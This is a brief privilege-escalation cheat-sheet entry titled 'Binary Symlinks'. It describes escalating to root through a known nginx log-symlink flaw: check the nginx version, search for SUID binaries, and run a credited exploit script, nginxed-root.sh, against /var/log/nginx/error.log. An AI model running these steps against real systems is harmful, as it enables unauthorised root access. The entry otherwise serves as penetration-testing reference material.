Binary Symlinks
Binary Symlinks
EXAMPLE
Author of the exploit: https://legalhackers.com/
REQUIREMENTS
Having the correct permissions of your user.
dpkg -l | grep nginx (Anyhing newer than 1.6.2 is patched)find / -type f -perm -u=s -lsa 2>/dev/null ls -la /var/log/nginx ./nginxed-root.sh /var/log/nginx/error.logLast updated